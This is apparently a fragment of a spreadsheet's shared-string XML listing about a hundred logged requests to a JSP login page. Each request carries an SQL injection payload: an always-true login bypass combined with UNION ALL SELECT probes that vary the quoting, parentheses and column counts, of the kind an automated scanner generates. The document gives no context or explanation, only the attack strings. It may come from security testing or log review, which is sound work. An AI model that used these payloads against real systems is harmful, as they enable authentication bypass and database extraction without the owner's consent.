    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('gbai'like'gbai</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('wkbg'like'wkbg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('kcqk'like'kcqk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('omlf'like'omlf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('erwb'like'erwb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('wnjf'like'wnjf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('ijdu'like'ijdu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null#and'lppm'like'lppm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and'kruu'like'kruu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and'pisb'like'pisb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and'qgua'like'qgua</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'tsdn'like'tsdn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'hkjj'like'hkjj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'wgoi'like'wgoi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'asuk'like'asuk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'qbtk'like'qbtk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'efib'like'efib</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null#and("yylc"="yylc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and("ujsx"="ujsx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and("hbyh"="hbyh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and("awlr"="awlr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("mwyq"="mwyq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("qbqb"="qbqb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("kfzl"="kfzl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("nwub"="nwub</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("frhi"="frhi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("ziqw"="ziqw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(("tpag"="tpag</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(("adze"="adze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(("xper"="xper</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("koji"="koji</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("xhzz"="xhzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("tirf"="tirf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("spao"="spao</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("zfkn"="zfkn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("xmdd"="xmdd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("wkox"="wkox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((("opqc"="opqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((("oqru"="oqru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((("fgox"="fgox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("cbaf"="cbaf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("oznr"="oznr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("pbzp"="pbzp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("vuwh"="vuwh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("wnss"="wnss</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("xxbi"="xxbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("sepe"="sepe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null#and"nxdb"="nxdb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and"bpit"="bpit</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and"oejj"="oejj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and"moks"="moks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"qmdt"="qmdt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"lytv"="lytv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"yaud"="yaud</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"vykc"="vykc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"wmwy"="wmwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"ykdc"="ykdc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null#and("upir"like"upir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and("srnm"like"srnm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and("pywu"like"pywu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and("qrua"like"qrua</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("gkud"like"gkud</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("sbbc"like"sbbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("tifw"like"tifw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("idze"like"idze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("cfpt"like"cfpt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("udwo"like"udwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(("zzze"like"zzze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(("uyns"like"uyns</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(("npww"like"npww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("lvhe"like"lvhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("gwfl"like"gwfl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("tzon"like"tzon</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("jqlp"like"jqlp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("fhad"like"fhad</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("cprx"like"cprx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("nhwy"like"nhwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((("gkvb"like"gkvb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((("vqrs"like"vqrs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((("sdci"like"sdci</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("futc"like"futc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("zbii"like"zbii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("dgey"like"dgey</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("feke"like"feke</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("gdox"like"gdox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("weej"like"weej</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("bjiw"like"bjiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null#and"wbmo"like"wbmo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and"uzpw"like"uzpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and"bcfg"like"bcfg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and"xfkx"like"xfkx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"zana"like"zana</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"hzfp"like"hzfp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"edrb"like"edrb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"ezog"like"ezog</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"zrwg"like"zrwg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"yntx"like"yntx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4481,4481,4481,4481,4481,4481,4481,4481,4481,4481,4481#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6086,6086,6086,6086,6086,6086,6086,6086,6086,6086,6086,6086#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4925,4925,4925,4925,4925,4925,4925,4925,4925,4925,4925,4925,4925#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8528,8528,8528,8528,8528,8528,8528,8528,8528,8528,8528,8528,8528,8528#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4433,4433,4433,4433,4433,4433,4433,4433,4433,4433,4433,4433,4433,4433,4433#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9144,9144,9144,9144,9144,9144,9144,9144,9144,9144,9144,9144,9144,9144,9144,9144#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3244,3244,3244,3244,3244,3244,3244,3244,3244,3244,3244,3244,3244,3244,3244,3244,3244#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059,1059#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110,4110#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343,9343#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9254,9254,9254,9254,9254,9254,9254,9254,9254,9254,9254,9254#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1143,1143,1143,1143,1143,1143,1143,1143,1143,1143,1143,1143,1143#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6536,6536,6536,6536,6536,6536,6536,6536,6536,6536,6536,6536,6536,6536#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1451,1451,1451,1451,1451,1451,1451,1451,1451,1451,1451,1451,1451,1451,1451#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215,2215#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2643,2643,2643,2643,2643,2643,2643,2643,2643,2643,2643,2643,2643,2643,2643,2643,2643#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640,3640#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect388,388,388,388,388,388,388,388,388,388,388,388,388,388,388,388,388,388,388#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674,5674#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591#</t>
  </si>
  <si>
